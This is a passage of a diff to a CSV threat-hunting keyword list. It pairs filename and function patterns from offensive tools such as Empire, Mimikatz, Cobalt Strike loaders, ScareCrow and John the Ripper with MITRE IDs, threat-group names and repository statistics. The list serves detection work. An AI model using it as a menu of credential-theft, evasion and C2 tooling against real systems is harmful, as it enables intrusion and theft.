Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*EnableRDesktopImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*Enable-SeAssignPrimaryTokenPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Enable-SeDebugPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Enable-SeDebugPrivilege*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*encdatavault2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*encfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Enable-SeAssignPrimaryTokenPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enable-SeDebugPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enable-SeDebugPrivilege*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - 
T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*encdatavault2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*encfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*encode_payload rc4 *.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*EncodeGroup/AggressiveProxy*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" -"*EncodeGroup/UAC-SilentClean*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*EncodeGroup/UAC-SilentClean*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" 
"*encodeScriptPolyglot*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*EncodeShellcode(*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*encrypt.py *.bin -p * -o *.enc*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*encrypt/encryptFile.go*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*encrypt/encryptUrl.go*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" -"*Encrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*encrypted_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Encrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*encrypted_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*EncryptedPfx.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" -"*EncryptedZIP.csproj*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*EncryptedZIP.exe*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*EncryptShellcode(*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*EncryptedZIP.csproj*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*EncryptedZIP.exe*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*EncryptShellcode(*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*ENDTHISFILETRANSMISSIONEGRESSASSESS*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*ENDTHISFILETRANSMISSIONEGRESSASSESS*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - 